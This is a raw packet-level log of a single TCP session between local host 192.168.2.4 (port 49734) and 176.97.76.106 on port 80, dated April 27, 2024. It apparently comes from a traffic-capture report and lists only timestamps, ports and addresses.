Apr 27, 2024 00:46:06.835026026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.835058928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.835634947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.835654020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.835669041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.835670948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.835689068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.835700989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.835719109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.835736036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.835751057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.835752010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.835766077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.835768938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.835783005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.835799932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.835813999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.835839987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.835854053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.835856915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.835875034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.835887909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.835916042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.835949898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.835951090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.835967064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.835985899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.835995913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.835999012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836013079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836026907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836030006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836046934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836061001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836062908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836077929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836097956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836107969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836136103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836153984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836169958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836170912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836184978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836188078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836205006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836205959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836215973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836224079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836240053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836257935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836268902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836286068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836303949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836321115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836344004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836359978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836376905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836391926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836395979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836407900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836425066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836425066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836441994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836443901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836456060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836476088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836823940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836843014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836862087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836873055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836888075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836905003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836922884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836935043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.836962938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.836996078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.837022066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.837064981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.837187052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.837205887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.837224960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.837235928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.837264061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.837301016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.837369919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.837412119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.837518930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.837537050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.837554932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.837564945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.837760925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.837796926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.837807894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.837842941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.837943077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.837976933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.838046074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.838082075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.838121891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.838157892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.838288069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.838321924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.838397026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.838428974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.838506937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.838542938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.838584900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.838617086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.838632107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.838668108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.838706970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.838741064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.838980913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.839019060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.839059114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.839076042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.839096069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.839107037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.839175940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.839219093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.839293003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.839309931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.839328051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.839340925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.839453936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.839493036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.839565039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.839601994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.840017080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.840035915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.840050936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.840066910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.840370893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.840389967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.840404987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.840425968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.840579033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.840610027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.840905905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.840924025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.840941906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.840958118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.840970039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.841005087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.841017008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.841051102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.845576048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.845618010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.845727921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.845772028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.846141100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.846168041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.846180916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.846199989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.846297026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.846323967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.846333027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.846349955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.846359968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.846385956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.846564054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.846590996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.846604109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.846625090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.846843004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.846883059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.846910000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.846946955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.847150087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.847189903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.847327948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.847364902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.847368956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.847398996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.847479105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.847513914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.847601891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.847640991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.847676039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.847707033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.847748041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.847773075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.847788095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.847807884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.847903013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.847929955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.847939968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.847960949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.848404884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.848433018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.848447084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.848467112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.848612070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.848649979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.848690033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.848728895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.848761082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.848797083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.848853111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.848891020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.849092960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.849121094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.849128008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.849154949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.849169016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.849208117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.849239111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.849265099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.849271059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.849291086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.849303007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.849327087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.857549906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.857588053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.857592106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.857625961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.978696108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.978740931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.978758097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.978775024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.978781939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.978821039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.978822947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.978842974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.978857994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.978872061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.979394913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.979413986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.979433060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.979444027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.979618073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.979636908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.979655027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.979671001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.980269909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.980288982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.980304956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.980318069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.980354071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.980370998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.980390072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.980405092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.980436087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.980468035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.980487108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.980506897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.980525017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.980537891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.980555058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.980586052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.980588913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.980618000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.980635881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.980665922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.980684042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.980701923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.980716944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.980720043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.980736971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.980753899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.980775118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.980781078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.981034994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.981069088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.981101990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.981132984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.981205940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.981239080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.981374025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.981391907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.981409073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.981410980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.981425047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.981425047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.981442928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.981445074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.981457949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.981477976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.981502056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.981518984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.981538057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.981575966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.981592894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.981632948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.981739044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.981746912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.981868029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.981887102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.981904984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.981941938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.982144117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.982161999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.982182026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.982197046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.982214928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.982251883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.982342958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.982377052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.982379913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.982417107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.982772112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.982808113 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.982812881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.982846022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.982851028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.982882977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.982898951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.982935905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.982969999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.982988119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983005047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983020067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983022928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983057976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983076096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983093023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983113050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983124971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983134985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983169079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983201027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983239889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983280897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983299971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983325005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983344078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983392954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983392954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983412981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983433008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983444929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983454943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983475924 CEST	80	49734	176.97.76.106	192.168.2.4
